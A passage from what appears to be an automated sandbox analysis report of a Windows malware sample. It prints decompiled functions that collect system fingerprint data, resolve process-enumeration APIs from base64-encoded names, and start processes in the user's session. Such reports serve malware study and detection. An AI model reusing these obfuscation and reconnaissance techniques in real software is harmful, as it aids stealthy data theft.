                                                                                                                                                                                                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                              • API String ID: 75899496-943277980
                                                                                                                                                                                              • Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                              • Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
                                                                                                                                                                                              • Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
                                                                                                                                                                                              • Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                              			E00407DD0(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v108;
                                                                                                                                                                                              				char _v112;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                              				_Unknown_base(*)()* _t30;
                                                                                                                                                                                              				intOrPtr* _t61;
                                                                                                                                                                                              				intOrPtr _t74;
                                                                                                                                                                                              				intOrPtr* _t76;
                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                              
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_v112 = 0;
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				 *[fs:eax] = _t81 + 0xffffff98;
                                                                                                                                                                                              				_t28 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
                                                                                                                                                                                              				_t30 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
                                                                                                                                                                                              				_t76 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
                                                                                                                                                                                              				E00402754(0,  &_v112);
                                                                                                                                                                                              				E00403D2C( &_v20, _v112);
                                                                                                                                                                                              				E00404F00();
                                                                                                                                                                                              				_v108 = 0x44;
                                                                                                                                                                                              				_v100 = 0;
                                                                                                                                                                                              				 *_t28( *[fs:eax], 0x407eea, _t81, __edi, __esi, __ebx, _t79, __ebx);
                                                                                                                                                                                              				_push( &_v16);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				if( *_t30() != 0) {
                                                                                                                                                                                              					 *_t76( &_v20, _v12, 0xffffffff);
                                                                                                                                                                                              					_t61 =  *0x41b5e8; // 0x41c728
                                                                                                                                                                                              					 *((intOrPtr*)( *_t61))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t74);
                                                                                                                                                                                              				 *[fs:eax] = _t74;
                                                                                                                                                                                              				_push(E00407EF1);
                                                                                                                                                                                              				E004034E4( &_v108);
                                                                                                                                                                                              				E00403B80( &_v16);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}





















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                                • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                              • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                              • API String ID: 2206896924-1825016774
                                                                                                                                                                                              • Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                              • Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
                                                                                                                                                                                              • Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                                                              			E00407DD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v108;
                                                                                                                                                                                              				_Unknown_base(*)()* _t25;
                                                                                                                                                                                              				_Unknown_base(*)()* _t27;
                                                                                                                                                                                              				intOrPtr* _t58;
                                                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v108 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                              				 *[fs:eax] = _t78 + 0xffffff98;
                                                                                                                                                                                              				_t25 = GetProcAddress(LoadLibraryA("kernel32.dll"), "WTSGetActiveConsoleSessionId");
                                                                                                                                                                                              				_t27 = GetProcAddress(LoadLibraryA("wtsapi32.dll"), "WTSQueryUserToken");
                                                                                                                                                                                              				_t73 = GetProcAddress(LoadLibraryA("userenv.dll"), "CreateEnvironmentBlock");
                                                                                                                                                                                              				E00402754(0,  &_v108);
                                                                                                                                                                                              				E00403D2C( &_v16, _v108);
                                                                                                                                                                                              				E00404F00();
                                                                                                                                                                                              				_v104 = 0x44;
                                                                                                                                                                                              				_v96 = 0;
                                                                                                                                                                                              				 *_t25( *[fs:eax], 0x407eea, _t78, __edi, __esi, __ebx, _t76);
                                                                                                                                                                                              				_push( &_v12);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				if( *_t27() != 0) {
                                                                                                                                                                                              					 *_t73( &_v20, _v12, 0xffffffff);
                                                                                                                                                                                              					_t58 =  *0x41b5e8; // 0x41c728
                                                                                                                                                                                              					 *((intOrPtr*)( *_t58))(_v12, E00403D3C(_v16), E00403D3C(_v8), 0, 0, 0, 0x400, _v20, 0,  &_v104,  &_v36);
                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t71);
                                                                                                                                                                                              				 *[fs:eax] = _t71;
                                                                                                                                                                                              				_push(E00407EF1);
                                                                                                                                                                                              				E004034E4( &_v108);
                                                                                                                                                                                              				E00403B80( &_v16);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}



















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34
                                                                                                                                                                                                • Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                              • String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
                                                                                                                                                                                              • API String ID: 2206896924-1825016774
                                                                                                                                                                                              • Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                              • Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00416B94(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _v17;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v584;
                                                                                                                                                                                              				char _v588;
                                                                                                                                                                                              				char _v592;
                                                                                                                                                                                              				char _v596;
                                                                                                                                                                                              				char _v600;
                                                                                                                                                                                              				char _v604;
                                                                                                                                                                                              				char _v608;
                                                                                                                                                                                              				char _v612;
                                                                                                                                                                                              				CHAR* _t113;
                                                                                                                                                                                              				CHAR* _t119;
                                                                                                                                                                                              				CHAR* _t125;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				void* _t141;
                                                                                                                                                                                              				void* _t169;
                                                                                                                                                                                              				signed int _t170;
                                                                                                                                                                                              				void* _t171;
                                                                                                                                                                                              				intOrPtr* _t174;
                                                                                                                                                                                              				signed int _t183;
                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                              				void* _t193;
                                                                                                                                                                                              				signed int _t194;
                                                                                                                                                                                              				signed int _t195;
                                                                                                                                                                                              				intOrPtr _t214;
                                                                                                                                                                                              				intOrPtr _t216;
                                                                                                                                                                                              				signed int _t229;
                                                                                                                                                                                              				intOrPtr* _t239;
                                                                                                                                                                                              				signed int _t240;
                                                                                                                                                                                              				signed int _t242;
                                                                                                                                                                                              				void* _t243;
                                                                                                                                                                                              				void* _t244;
                                                                                                                                                                                              				void* _t246;
                                                                                                                                                                                              				intOrPtr _t247;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t238 = __esi;
                                                                                                                                                                                              				_t245 = _t246;
                                                                                                                                                                                              				_t247 = _t246 + 0xfffffda0;
                                                                                                                                                                                              				_v612 = 0;
                                                                                                                                                                                              				_v608 = 0;
                                                                                                                                                                                              				_v604 = 0;
                                                                                                                                                                                              				_v596 = 0;
                                                                                                                                                                                              				_v600 = 0;
                                                                                                                                                                                              				_v592 = 0;
                                                                                                                                                                                              				_v588 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                              				_v16 = __eax;
                                                                                                                                                                                              				 *[fs:eax] = _t247;
                                                                                                                                                                                              				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                                                                                                                                                                                              				_t113 = E00403990(_v588);
                                                                                                                                                                                              				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113);
                                                                                                                                                                                              				E00406984("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
                                                                                                                                                                                              				_t119 = E00403990(_v592);
                                                                                                                                                                                              				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119);
                                                                                                                                                                                              				E00406984("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
                                                                                                                                                                                              				_t125 = E00403990(_v596);
                                                                                                                                                                                              				E00406984("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
                                                                                                                                                                                              				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125);
                                                                                                                                                                                              				E004034E4(_v16);
                                                                                                                                                                                              				_t193 =  *_t192(2, 0,  *[fs:eax], 0x416eca, _t246, __edi, __esi, __ebx, _t244);
                                                                                                                                                                                              				if(_t193 != 0xffffffff) {
                                                                                                                                                                                              					_v584 = 0x22c;
                                                                                                                                                                                              					_push( &_v584);
                                                                                                                                                                                              					_push(_t193);
                                                                                                                                                                                              					if( *_t235() != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_push(E004045EC(_v8) + 1);
                                                                                                                                                                                              							E004047A8();
                                                                                                                                                                                              							_t183 = E004045EC(_v8);
                                                                                                                                                                                              							_t243 =  &_v584;
                                                                                                                                                                                              							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2);
                                                                                                                                                                                              							_t247 = _t247 + 0x10;
                                                                                                                                                                                              							_t235 = _t243 + 0x116;
                                                                                                                                                                                              							_t239 = _t239;
                                                                                                                                                                                              							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
                                                                                                                                                                                              							_push( &_v584);
                                                                                                                                                                                              							_push(_t193);
                                                                                                                                                                                              						} while ( *_t239() != 0);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t174 =  *0x41b57c; // 0x41c690
                                                                                                                                                                                              					 *((intOrPtr*)( *_t174))(_t193);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t137 = E004045EC(_v8) - 1;
                                                                                                                                                                                              				if(_t137 >= 0) {
                                                                                                                                                                                              					_v28 = _t137 + 1;
                                                                                                                                                                                              					_t195 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_v17 = 1;
                                                                                                                                                                                              						_t169 = E004045EC(_v8) - 1;
                                                                                                                                                                                              						if(_t169 >= 0) {
                                                                                                                                                                                              							_t171 = _t169 + 1;
                                                                                                                                                                                              							_t229 = 0;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_t43 = _t195 * 0x8b * 4; // 0x0
                                                                                                                                                                                              								_t242 = _t229 * 0x8b;
                                                                                                                                                                                              								_t235 = _v8;
                                                                                                                                                                                              								_t47 = _t242 * 4; // 0x1ffff
                                                                                                                                                                                              								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                                                                                                                                                                                              									_v17 = 0;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t229 = _t229 + 1;
                                                                                                                                                                                              								_t171 = _t171 - 1;
                                                                                                                                                                                              							} while (_t171 != 0);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t170 = _t195 * 0x8b;
                                                                                                                                                                                              						_t52 = _t170 * 4; // 0x0
                                                                                                                                                                                              						_t56 = _t170 * 4; // 0x1ffff
                                                                                                                                                                                              						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                                                                                                                                                                                              							_v17 = 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v17 == 1) {
                                                                                                                                                                                              							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t195 = _t195 + 1;
                                                                                                                                                                                              						_t64 =  &_v28;
                                                                                                                                                                                              						 *_t64 = _v28 - 1;
                                                                                                                                                                                              					} while ( *_t64 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = GetCurrentProcessId();
                                                                                                                                                                                              				_t141 = E004045EC(_v8) - 1;
                                                                                                                                                                                              				if(_t141 >= 0) {
                                                                                                                                                                                              					_v28 = _t141 + 1;
                                                                                                                                                                                              					_t194 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t240 = _t194 * 0x8b;
                                                                                                                                                                                              						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) {
                                                                                                                                                                                              							_t75 = _t240 * 4; // 0x1ffff
                                                                                                                                                                                              							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                                                                                                                                                                                              								_push(_v24);
                                                                                                                                                                                              								_t90 = _t240 * 4; // 0x0
                                                                                                                                                                                              								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                                                                                                                                                                                              								_push(_v608);
                                                                                                                                                                                              								_push(E00416F84);
                                                                                                                                                                                              								E00403850();
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_push(_v24);
                                                                                                                                                                                              								_t82 = _t240 * 4; // 0x0
                                                                                                                                                                                              								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                                                                                                                                                                                              								_push(_v604);
                                                                                                                                                                                              								_push(0x416f78);
                                                                                                                                                                                              								_push(E00416F84);
                                                                                                                                                                                              								E00403850();
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t96 = _t194 * 0x8b * 4; // 0x1ffff
                                                                                                                                                                                              							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
                                                                                                                                                                                              							E00403798( &_v24, _v612);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E00403538(_v16, _v24);
                                                                                                                                                                                              						_t194 = _t194 + 1;
                                                                                                                                                                                              						_t103 =  &_v28;
                                                                                                                                                                                              						 *_t103 = _v28 - 1;
                                                                                                                                                                                              					} while ( *_t103 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t214);
                                                                                                                                                                                              				 *[fs:eax] = _t214;
                                                                                                                                                                                              				_push(E00416ED1);
                                                                                                                                                                                              				E00403508( &_v612, 7);
                                                                                                                                                                                              				E004034E4( &_v24);
                                                                                                                                                                                              				_t216 =  *0x4169c8; // 0x4169cc
                                                                                                                                                                                              				return E004047B4( &_v8, _t216);
                                                                                                                                                                                              			}









































                                                                                                                                                                                              0x00416da4
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416daf
                                                                                                                                                                                              0x00416dba
                                                                                                                                                                                              0x00416dbd
                                                                                                                                                                                              0x00416dc4
                                                                                                                                                                                              0x00416dc7
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dd7
                                                                                                                                                                                              0x00416de0
                                                                                                                                                                                              0x00416de7
                                                                                                                                                                                              0x00416e22
                                                                                                                                                                                              0x00416e2e
                                                                                                                                                                                              0x00416e37
                                                                                                                                                                                              0x00416e3c
                                                                                                                                                                                              0x00416e42
                                                                                                                                                                                              0x00416e4f
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416df5
                                                                                                                                                                                              0x00416dfe
                                                                                                                                                                                              0x00416e03
                                                                                                                                                                                              0x00416e09
                                                                                                                                                                                              0x00416e0e
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e5e
                                                                                                                                                                                              0x00416e6d
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e87
                                                                                                                                                                                              0x00416e8c
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416e98
                                                                                                                                                                                              0x00416e9b
                                                                                                                                                                                              0x00416e9e
                                                                                                                                                                                              0x00416eae
                                                                                                                                                                                              0x00416eb6
                                                                                                                                                                                              0x00416ebe
                                                                                                                                                                                              0x00416ec9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                              • API String ID: 3877065590-4127804628
                                                                                                                                                                                              • Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                                                                                                                                                                                              • Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
                                                                                                                                                                                              • Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00416B8C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				char _v17;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v584;
                                                                                                                                                                                              				char _v588;
                                                                                                                                                                                              				char _v592;
                                                                                                                                                                                              				char _v596;
                                                                                                                                                                                              				char _v600;
                                                                                                                                                                                              				char _v604;
                                                                                                                                                                                              				char _v608;
                                                                                                                                                                                              				char _v612;
                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                              				CHAR* _t121;
                                                                                                                                                                                              				CHAR* _t127;
                                                                                                                                                                                              				void* _t139;
                                                                                                                                                                                              				void* _t143;
                                                                                                                                                                                              				void* _t171;
                                                                                                                                                                                              				signed int _t172;
                                                                                                                                                                                              				void* _t173;
                                                                                                                                                                                              				intOrPtr* _t176;
                                                                                                                                                                                              				signed int _t185;
                                                                                                                                                                                              				intOrPtr* _t194;
                                                                                                                                                                                              				void* _t195;
                                                                                                                                                                                              				signed int _t196;
                                                                                                                                                                                              				signed int _t197;
                                                                                                                                                                                              				intOrPtr _t216;
                                                                                                                                                                                              				intOrPtr _t218;
                                                                                                                                                                                              				signed int _t231;
                                                                                                                                                                                              				intOrPtr* _t241;
                                                                                                                                                                                              				signed int _t242;
                                                                                                                                                                                              				signed int _t244;
                                                                                                                                                                                              				void* _t245;
                                                                                                                                                                                              				void* _t246;
                                                                                                                                                                                              				void* _t248;
                                                                                                                                                                                              				intOrPtr _t249;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t240 = __esi;
                                                                                                                                                                                              				_t109 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t109 =  *_t109 + _t109;
                                                                                                                                                                                              				_t110 = _t109 | 0x5500000a;
                                                                                                                                                                                              				_t247 = _t248;
                                                                                                                                                                                              				_t249 = _t248 + 0xfffffda0;
                                                                                                                                                                                              				_v612 = 0;
                                                                                                                                                                                              				_v608 = 0;
